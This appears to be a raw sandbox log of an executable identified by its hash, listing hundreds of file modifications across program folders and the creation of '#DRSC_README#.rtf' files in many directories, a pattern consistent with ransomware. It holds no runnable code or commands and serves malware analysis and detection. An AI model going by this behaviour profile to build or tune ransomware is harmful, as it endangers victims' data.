710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-uisupport.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Vancouver 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Andorra 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\hu\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\New_Skins.url 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-heapdump_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\win32_LinkNoDrop32x32.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-1 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\default.vlt 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Windows Journal\en-US\JNTFiltr.dll.mui 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\management\jmxremote.access 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\extensions\VLSub.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\cue.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Troll 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\omni.ja 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\tnameserv.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Tirane 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\CST6CDT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Macau 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\vocaroo.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application-views_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_de.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Jakarta 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Santo_Domingo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher_1.3.0.v20140911-0143.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\art\03_lastfm.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\dragHandle.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-api-visual.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\MEIPreload\manifest.json 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_pt_BR.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-execution_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-windows_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-uisupport_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\create_stream.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Spelling.api 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.di.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-fallback_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-execution.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Hovd 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\asl-v20.txt 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Pitcairn 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Mazatlan 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\klist.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.jarprocessor.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.transport.ecf_1.1.0.v20140408-1354.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.ui.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Magadan 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\ECLIPSE_.RSA 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-util-lookup_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\feature.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Windows Journal\PDIALOG.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Macau 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.jdp_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\alt-rt.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\amd64\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ia\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_228ef1_256x240.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\calendars.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.app_1.3.200.v20130910-1609.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaSansRegular.ttf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\ECLIPSE_.SF 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.di_1.0.0.v20140328-2112.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.manipulator_2.0.0.v20131217-1203.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.batik.css_1.7.0.v201011041433.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench3.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Menominee 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\extensions\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-outline_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-queries.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-favorites_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\zu\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Anadyr 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Brussels 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.felix.gogo.command_0.10.0.v201209301215.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBlue.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre7\lib\zi\Pacific\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\IA32.api 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\ms.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+2 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach.zh_CN_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt_0.11.101.v20140818-1343.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Buenos_Aires 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\MEIPreload\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\WidevineCdm\_platform_specific\win_x64\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Eirunepe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Dili 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\localedata.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Windows Journal\en-US\PDIALOG.exe.mui 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Sydney 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7TSFrame.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-options-api.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Rothera 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\vlc-48.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\hi\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Riyadh 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.base_4.0.200.v20141007-2301.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\org-openide-filesystems_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Oral 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\lt\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\js\common.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Juneau 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Bahia_Banderas 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\jni_md.h 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\equalizer_window.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Jerusalem 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.expressions_3.4.600.v20140128-0851.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.continuation_8.1.14.v20131031.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\default_apps\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\it\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Form.zip 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Yellowknife 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Thimphu 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-api-caching_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\modules\simplexml.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Tokyo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Yekaterinburg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+10 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\msmdsrv.rll 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\ml.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-loaders_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\plugins.dat 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\ConfirmPush.mp3 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\flight_recorder.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-output2_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.model.workbench_1.1.0.v20140512-1820.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.renderers.swt_0.12.1.v20140903-1023.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\WindowsMedia.mpp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Hong_Kong 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Honolulu 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\Xusage.txt 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 